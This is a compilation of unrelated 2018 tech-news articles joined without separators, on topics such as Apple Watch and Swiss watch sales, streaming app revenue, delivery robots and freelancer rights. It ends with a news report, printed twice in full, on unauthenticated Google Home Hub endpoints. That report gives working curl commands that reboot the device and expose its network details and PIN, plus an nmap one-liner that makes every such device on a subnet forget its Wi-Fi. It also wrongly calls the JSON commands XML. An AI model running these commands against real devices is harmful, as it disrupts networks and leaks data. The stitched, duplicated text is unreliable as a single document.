In 2015 Switzerland was fucked. This blunt belief, grunted out by Apple’s Jony Ive and repeated by the media as a death knell for the watch industry, seemed to define a sad truth: that the Swiss watch was dead and Apple pulled the trigger.

Now, three years and four Apple Watches later, was Ive right? Did Apple change the world? And, most importantly, did Switzerland survive?

Yes, but…

As you might have noticed the Swiss watch industry is still standing. The major Swiss houses – LVMH, Richemont, and Swatch Group – are seeing a major uptick in sales, especially in the US. According to the Federation of the Swiss Watch Industry, sales are up 5.5% year-over-year, a bit of news that was, amusingly, almost buried by the onslaught of Apple Watch Series 4 reviews.

This increase of US sales bucked a major trend this year and one market insider, who preferred to remained anonymous, noted that all of his sales contacts are seeing increased sales in the $3,000 and above watch category. While the low-cost fashion watches were, as he said, “decimated,” the luxury market is growing. But why?

According to Swatch Group, Swiss watch exports rose 4.8 percent compared with last year and, according to a Reuters report, “first-quarter watch exports rose 10.1 percent, the highest quarterly growth rate since mid-2012, according to figures from the Federation of the Swiss Watch Industry.”

“You know we saw an end of the year that was very strong – double-digit growth – and now it continues, so every month is a record month for us,” Swatch Group CEO Nick Hayek told CNBC. In short, the industry is back from an all-time low after the recession.

Watch analysts believe that Apple created a halo effect. Of the millions of people who bought and wore an Apple Watch, a majority had never worn or thought about wearing a watch. Once they tried the Apple Watch, however, and outfitted it with leather bands, fancy Milanese loops, and outfit-matching colors the attitude changed. If wearing watches is so fun and expressive, why not try other, more storied pieces? The numbers are hard to find (watchmakers are notoriously secretive) but I’ve found that my own watch obsessives site, WristWatchReview, saw a solid uptick in traffic in 2015, one that continued, for the most part, into 2018. One year, 2017, was considerably lower because my server was failing almost constantly.

What does this mean for the watch? First, it means that, like vinyl, a new group of obsessives are taking up the collector’s mantle after discovering the implicit value of more modern forms of the same thing. An Apple Watch is a gateway drug to a Tissot which is a gateway drug to a classic tropical Rolex Submariner on a signed band just as your first Radiohead MP3 leads to buying a turntable, an amp, a Grado cartridge, and a pressing of Moon Shaped Pool.

“In high school I wore a pebble for a while,” said Brady, a 20-year-old college sophomore I spoke to. “As an easily-distracted high school student, even though this wearable was very primitive tech, it consumed a lot of my attention when it wasn’t appropriate to be on my phone – which meant also not appropriate to be on my watch. I then shifted to Nixon quartz ‘fashion watches ‘and i was happy knowing they kept good reliable time. Then I got a Seiko SNK805 automatic. I don’t have a single non-mechanical watch due to my respect for the craftsmanship!”

Wearables are changing, as well, pushing regular watches back into the spotlight. As Jon Speer, VP at Greenlight.Guru, most wearables won’t look like watches in the next few years.

“I predict the next generation of wearables to blur the lines between tech accessory and medical device. These ‘devices’ will include capabilities such as measuring blood pressure, blood sugar, body temperature and more,” he said. “The FDA is working closely with industry partners to identify common roadblocks to innovation. The De Novo Program, the classification Apple pursued for the Apple Watch, is the category for medical devices that don’t fall within an existing classification. As we blend medical technology with consumer technology, I foresee the De Novo program being utilized by companies such as Fitbit and Garmin. As a consumer, I’m very excited for the potential and advancements.”

Thus the habit of wearing watch might stick even as the originators of that habit – a little square of steel and glass strapped to your wrist – disappears.

Could it all be a mirage?

The new Apple Watch is very positively reviewed and Android Wear – as evidenced by companies like Montblanc selling very capable and fashion-forward smartwatches – is still a force to be reckoned with. Further, not everyone falls back into watch wearing after trying out the thing Jony Ive said would fuck Switzerland.

Watches are an acquired taste like craft beers, artisanal teas, and other Pinterest -ready pursuits. Sometimes simply strapping one to your wrist isn’t enough.

“I got the first gen Apple Watch,” said entrepreneur David Berkowitz. “I loved it, and then I stopped wearing it a bit. As I did, I lost the charger and never bothered replacing it. I haven’t worn it since and haven’t seriously considered getting a new one.”

“I’m just not that customer,” he said.

Last year, the top subscription video apps like Netflix and Hulu raked in a combined $781 million, and that trend is showing no sign of slowing down in 2018. In the third quarter of 2018, U.S. consumers spent an estimated $329 million in the top 10 subscription video-on-demand apps across the App Store and Google Play – a figure that’s up 15 percent from the $285 million spent in Q1.

The data is the latest in a new report from app intelligence firm Sensor Tower, which has been following the growth of subscription video apps for some time. Last year, for example, it found that Netflix’s app topped the charts in terms of revenue, when compared with all the other non-game apps on the market.

Netflix hasn’t fallen from its top ranked position, the new data shows. In fact, it’s continuing to grow.

The app pulled in an estimated $132 million in consumer spending across the app stores in Q3, which is up 78 percent from the $74 million spent in the third quarter of 2017.

However, Hulu is now growing faster, the report found. It saw subscription revenue jump 86 percent to $39 million, up from $21 million a year ago.

It seems some consumers may have made the move to Hulu thanks to the extra cash they had on hand, thanks to dropping their HBO subscription.

The only subscription video app that saw revenue decline in Q3 was HBO NOW, which took in $41 million in the quarter, down 40 percent from the $68 million in Q3 2017. But notably absent this quarter was the network’s biggest draw, “Game of Thrones,” which had been airing at this time last year. A drop was expected.

The top grossing chart of these subscription video apps for Q3 2018 looks very similar to last year’s in terms of the apps included, and sometimes, even their rankings.

But two services made moves, the report says.

YouTube TV jumped from $3 million in the year-ago quarter to $16 million in Q3 on Apple’s App Store, thanks to its expanded market penetration and consumer adoption. And ESPN Live Sports, which added in-app subscriptions in Q2, grossed $4.6 million in the third quarter, up 119 percent from Q2.

Even CBS is doing well, despite the fact that not everyone loves the new “Star Trek.”

Still, it appears CBS made a good move by betting on fans’ devotion to the franchise, as U.S. consumers spent $6 million in the app in Q3 2018, up 50 percent from the $4 million spent in Q3 2017.

The report’s data includes subscription revenues only, not refunds or in-app advertising revenues, Sensor Tower notes.

The broad increases in consumer spending on these video apps is yet another example of the significant and growing subscription business – much of which is taking place on mobile. Subscriptions accounted for $10.6 billion in consumer spend on the App Store in 2017, and are poised to grow to $75.7 billion by 2022, an earlier report found.

However, the top subscription apps aren’t all video apps. Others that consistently rank highly in the U.S. include Tinder, Spotify and Pandora, for example. Currently, the top grossing chart for the App Store includes a number of non-games, like Netflix (#1), YouTube (#2), Tinder (#3), Pandora (#4), Hulu (#7), and Bumble (#8).

The Daily Crunch is TechCrunch’s roundup of our biggest and most important stories. If you’d like to get this delivered to your inbox every day at around 9am Pacific, you can subscribe here:

1. Waymo, take the wheel: Self-driving cars go fully driverless on California roads

The Alphabet-owned company has been testing on public roads for years now. But this permit, issued by the California Department of Motor Vehicles, allows Waymo to test these self-driving cars without a human driver behind the wheel.

Waymo said its driverless test cars will initially hit the streets near its Silicon Valley headquarters, including parts of Mountain View, Sunnyvale, Los Altos, Los Altos Hills and Palo Alto.

2. Facebook bans the Proud Boys, cutting the group off from its main recruitment platform

We reported in August that the Proud Boys operate a surprisingly sophisticated network for getting new members into the fold via many local and regional Facebook groups.

3. Up close and hands-on with the new iPad Pro

The new Pro, which Apple unveiled yesterday, marks what is arguably the single largest design change to the iPad line in its eight-and-a-half-year existence.

4. Facebook shares climb despite Q3 user growth and revenue

The social network stumbled again in Q3, but shares climbed after its latest earnings report, thanks in part to Facebook’s $5.14 billion profit and the addition of 1 million users in North America.

5. Twitter’s doubling of character count from 140 to 280 had little impact on length of tweets

According to new data released by Twitter, only 1 percent of tweets hit the 280-character limit, and only 12 percent are longer than 140 characters.

6. Apple pulls WatchOS 5.1 update after it bricked some Apple Watches

If you’re an Apple Watch owner having trouble finding the shiny new WatchOS 5.1 update, turns out it isn’t quite ready yet.

7. Starship is using self-driving robots to deliver packages on demand

Once your package arrives at a local Starship facility, the app will notify you. Then you can request a Starship bot that will deliver the package to you, wherever you are.

 

With Apple’s AirPower still missing in action, the Apple accessory ecosystem has been attempting to fill the need with similar products. Some of these third party products are better than others, and the new Base Station from Nomad looks to be the best of them all.

The Base Station does two things. One, it wireless charges up to three mobile devices. Two, it charges an Apple Watch through an integrated Apple MFi-certified Magnetic Apple Watch charger. More so, it looks great.

A padded leather surface covers three charging coils allowing the unit to recharge up to three devices — or one device laying horizontally across the pad. Each of the coils are Qi-certified and output at 7.5W. As for the Apple Watch, it can only be recharged using the included magnetic charger unless Apple activates Qi-compatibility through a software update.

The Nomad Base Station is available now for $120. Don’t have an Apple Watch? The same charging base is available for $20 less and still supports up to three devices.

Live streaming TV services, like Sling TV, PlayStation Vue, Hulu with Live TV, and others, are gaining steam in the U.S. as more consumers cut the cord with traditional pay TV. According to a new report from Conviva out this morning, these services (called virtual MVPDs) now account for over three-quarters of all plays and viewing hours in the U.S. That growth has come at the expense of dedicated apps from individual publishers, the report found.

Over the past 12 months, streaming TV services – the virtual MVPDs like Hulu with live TV, Sling TV, or PlayStation Vue – have seen a 292 percent increase in plays and a 212 percent increase in viewing hours, while publisher apps have seen declines of 16 percent and 19 percent, respectively, across those fronts.

The services have also been improving over time. Many suffered from glitches and outages at launch – and this continues today, on occasion. But overall, they’re more stable than in the past.

The report found that across these streaming TV services, there’s been a 22 percent decrease in video start failures, a 7 percent shorter wait time for video to start playing, 25 percent higher picture quality, and 63 percent less buffering.

The draw of streaming TV services is a cable TV-like experience with added benefits, like the ability to watch across devices, record shows to a cloud DVR that’s not (in theory) limited by disk space on a set-top box, integration with your smartphone’s notification system for alerts about favorite shows or events, and more.

But the ability to tune into live content – like live events and sports – is a major draw for cord cutters, as well.

Year-over-year, live TV content has seen a 49 percent increase in plays and a 54 percent increase in viewing time. The NFL is a huge part of this, with plays up 72 percent and viewing hours up 83 percent in Q3 2018, versus the year-ago quarter.

In the weeks that games were airing, NFL viewership accounted for 3 percent of total plays and 2.8 percent of all viewing hours in the U.S.

Because many viewers tune in at the same time to watch a live broadcast, compared with other content, there’s still room for improvement on this front. The firm also found that live television streams take 10 percent longer for videos to start, and see 72 percent more exits before the video starts, as a result.

The way consumers are watching streaming TV services is changing, too, the study said.

Though one benefit of these newer services is no longer being tied to a TV for viewing, it seems many still prefer it. While mobile viewing continues to grow – it’s up 57 percent year-over-year – it no longer dominates.

Connected TVs – such as those connected to Roku players, Amazon Fire TV, Apple TV, etc. – now account for as many streaming TV plays (38% on TVs) as mobile devices (39%). They also account for more than twice the viewing hours, with a 56 percent share to mobile’s 25 percent share.

Viewing on the PC is down by 18 percent, meanwhile.

Conviva, like other reports, have found that Roku leads the market – in this case, in terms of viewing hours. Roku accounted for 40 percent of viewing hours, but Amazon Fire TV gained. Amazon’s connected TV device platform increased its share of viewing hours from 3 percent to 18 percent over the past 12 months, and increase its share of plays from 4 percent to 19 percent.

The report is a snapshot of the industry that comes from Conviva’s global footprint of 50 billion streams per year across 3 billion applications and 200 million users. The company works with brands like Sling TV, HBO, Sky, Turner, Hulu, Discovery, CBS, Canal Digital, and others. That gives it deep insight into the streaming TV space to see trends, but not a complete look as not all providers are Conviva customers.

 

 

 

This is clever. Made by HyperDrive, the USB-C Hub slips onto an Apple USB-C power adapter and adds two USB 3.0 ports. That’s all. I love it and it addresses a major shortcoming of Apple’s current notebook lineup.

Apple ditched full size USB ports in favor of the versatile USB-C. It makes sense on some levels. USB-C supports nearly every bus format available but there are still a bunch of devices that ship with the older USB plug. Like the iPhone. If a person walks into an Apple store and buys the latest iPhone and the latest MacBook Pro, the iPhone will need a dongle to recharge off the MacBook Pro. Why not make it this dongle?

Similar devices have long been on the market but tend to use the power port to add a USB port. This one uses the power of USB-C, which results in an adapter that’s a touch smaller than the alternatives.

The HyperDrive USB-C Hub comes in two flavors to match the two versions of Apple’s power adapters. The USB-C Hub for the 61W power adapter costs $39.99 while the USB-C Hub for the 87W power adapter costs $49.99. Both are right now to pre-order at a 25% discount from Hyper.

Soon, the days of package theft will be behind us. For people living in the U.K. town of Milton Keynes, that day is today. That’s thanks to autonomous robot startup Starship Technologies .

Starship’s on-demand package delivery requires you to first install the app to receive a delivery address to go in the place of your home address, or wherever else you usually get packages delivered. That Starship-provided delivery address is where the company’s local facility is located. Once your package arrives there, the app will notify you and enable you to request a Starship bot to deliver it to you, wherever you are. Through the app, you can also track where your package is at all times.

Starship delivers to home within a two-mile radius but has plans to expand its service area to make farther deliveries. The company says the battery is not a limitation, but that it merely wants wait time to be as short as possible.

By the end of the year, Starship aims for the service to be available to residents in the San Francisco Bay Area. Pricing has yet to be determined in the U.S., but in the UK, Starship offers the first month for free and then £7.99 per month for an unlimited number of package deliveries.

“The hassle of needing to re-arrange your life for a delivery will become a thing of the past. No more having to switch your working from home day, reschedule meetings, visit a locker, drive to a post office or contact a courier all because of a missed delivery. Starship gets packages to consumers when and where they want them. This is the only service of its kind available in the world today, and it works around your lifestyle.”

A few months ago, Starship raised $25 million from Matrix Partners and Morpheus Ventures. New investors include Airbnb co-founder Nathan Blecharczyk, Skype founding engineer Jaan Tallinn and others. Starship has raised $42.2 million in total.

Starship has previously partnered with on-demand food delivery companies like DoorDash and Postmates to test out its robot delivery service. Last January, Starship partnered with the companies mentioned above for a pilot program in Redwood City, Calif. and Washington, D.C. To date, Starship robots have traveled more than 125,000 miles in 20 countries, across 100 cities.

Gig workers, freelancers, sharing economy workers — call them what you want to, but the millions who drive you around in Lyfts, drop off your Seamless delivery or work on piecemeal projects from home have become a staple of the American workforce — and their numbers are only set to grow.

A report out today says 56.7 million Americans worked as freelancers in the last year. That is more than 1 out of 3 of the entire labor force.

For full-time employees, a whole array of protections exists to make sure they get paid, are not discriminated against and retain some income if they lose their jobs. From federal employment laws to state laws and city ordinances, employees have recourse for wrongdoing by employers. But for the fast-growing segment of Americans working as freelancers, little to no legal protections exist.

That’s beginning to change. From a modern take on labor unions in the shape of the Freelancers Union to legal tech startups trying to provide freelancers with simple and accessible contracts that protect their rights, freelancer protections are slowly catching up to the incredible growth that the gig economy has seen over the past few years.

Who is freelancing?

The Freelancers in America Study published today provides a window into who’s doing all the gig jobs around. Jointly commissioned by the Freelancers Union, which has more than 400,000 members nationwide, and Upwork, the largest freelancing website, the study is now in its fifth edition.

It found that freelancers live all across the United States, more than 40% of them are younger than 35 and almost two thirds of them found their work online. At the current rate of growth, we can expect the majority of the US workforce to freelance within less than a decade.

For the most part, the study found that freelancers are content with their work. More than half of those surveyed said that no amount of money would get them to take a traditional job. Compared to non-freelancers, freelancers have a better work/life balance and more control over their schedule, resulting in less stress and better health.

Yet, unlike their traditional full-time counterparts, freelancers disproportionately worry about whether they’re going to get paid for the work they complete, and how they can pursue claims for payment if they don’t. Nearly 70% of freelancers have struggled to collect payment for work they’d completed.

Protecting freelancers

This is where organizations like the Freelancers Union come in. Unlike traditional unions, membership in the Freelancers Union is free — with grants from various donors and fees from offering insurance plans covering the Union’s costs. While membership in traditional private-sector unions peaked in the 1970s and has been in a steady decline since, the Freelancers Union has seen steady growth since it was founded in 1995 and is currently growing at a rate of 1,000 new members a week.

Caitlin Pearce, the union’s Executive Director, tells me that freelancers deal with a fundamental power imbalance. With less than a fourth of them using a contract to protect their rights, they are often left at the mercy of the employer. “Freelancers are basically cut off from all the workplace protections that have become commonplace,” she explained.

In response to the concerns of its members, the Union has been advocating for timely payment by employers, access to affordable health care and more income predictability.

Last year, the Union led a successful advocacy drive to pass the “Freelance Isn’t Free Act” by the New York city council. Under this act, businesses hiring freelancers in New York City are required to use a contract, must pay within 30 days of the work being complete, and freelancers can file a claim with the city to resolve issues they have with businesses. If the claim is successful, then businesses have to pay freelancers double the damages, in addition to the freelancer’s attorney fees.

Serious challenges remain. Even the act itself can’t protect workers who work remotely from as close as New Jersey for businesses based in New York. Effective protections need state and federal level laws, but Pearce says that even within New York State they found little appetite for legislation to protect freelancers’ rights.

For now, the Freelancers Union is doubling down on their municipal strategy, advocating for other cities where many freelancers are based to adopt ordinances similar to the one passed in New York.

Pearce says they’ve started to gain traction in Philadelphia and Madison, and are using the New York campaign as a model. New York showed the Union the widespread support they can galvanize for freelancer rights. From traditional labor unions to WeWork and Kickstarter, a wide range of groups came together to support passing the act. In the end, it passed unanimously, with all 51 New York City council members, including three Republicans, supporting it.

“It’s just a common sense law, if you do work you deserve to be paid,” stresses Pearce. The hope now is that same common sense can prevail in other cities, states and eventually federally.

The startup approach

Protections for freelancers are not only coming from union-like organizations. Some legal tech startups are working to provide more affordable contract services directed specifically at freelancers and small businesses.

Gina Pak and Liam Moriarty met during their time at Columbia Law School, and at first followed the typical attorney route of working for high-powered New York law firms. But a few years into their law careers, they both quit their jobs, packed up their Upper West Side apartment and moved out to Los Angeles to co-found Lawgood.

Pak and Moriarty had found that bad contracts in the US were giving rise to more than 12 million lawsuits every single year, costing the national economy more than $600 billion. Freelancers and small businesses can’t afford attorney fees, and so choose to write their own risky contracts, or go without a contract at all, leading to lawsuits when things inevitably go awry.

Instead, Lawgood provides an online service, where freelancers and businesses can upload any contract they have questions about and get feedback for the fraction of the cost of hiring an attorney.

Then, the company’s system combines a network of carefully vetted lawyers with artificial intelligence technology designed to detect potential problems in the contract. Each user gets a marked-up contract that provides notices of potential issues, simplified explanations of complex wording, and suggestions on how to negotiate.

Pak tells me that as things currently stand, “laws are just inadequate when it comes to protecting freelancers and are not keeping up with the times.” A well-drafted contract can protect both the freelancer and the company that hires them. But in her experience, even the word contract has a bad rep. “It’s a pain point that people just don’t want to go through, and some freelancers are even hesitant to ask for a contract because they don’t want to signal a lack of trust in the person hiring them.”

This means that for Lawgood, apart from enabling freelancers to get affordable, easy to understand contracts, they have to advocate for behavior change. They have to convince freelancers that contracts are one of the most effective communication tools if written well. “Don’t think of it as distrust,” encourages Pak, “but a tool for both sides to succeed and be clear on expectations.”

What does the future hold for supporting freelancers’ rights?

While organizations like the Freelancers Union and startups like Lawgood offer some hope for freelancers, it’s clear that more national level protections are needed to make sure freelancers aren’t taken advantage of.

In that sense, the Freelancers in America Study offers some important clues as to why politicians everywhere should be paying more attention to freelancers. Apart from the fact that they already represent more than 1 out of 3 American workers, the study showed that freelancers are 19 points more politically active than non-freelancers.

Even more strikingly, a whopping 72% of freelancers said they’d be willing to cross party lines to vote for candidates who support freelancers’ rights.

Pearce says one of the best outcomes from publishing the study is quantifying the number of freelancers, a loose and dispersed constituency that had not been properly counted before. The hope now is that their size, level of political engagement and willingness to cross party lines, will lead to politicians taking on their cause and eventually pass legislation protecting their rights. Until that happens, freelancers should push for contracts that protect them and join groups like Freelancers Union to amplify their voices.

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.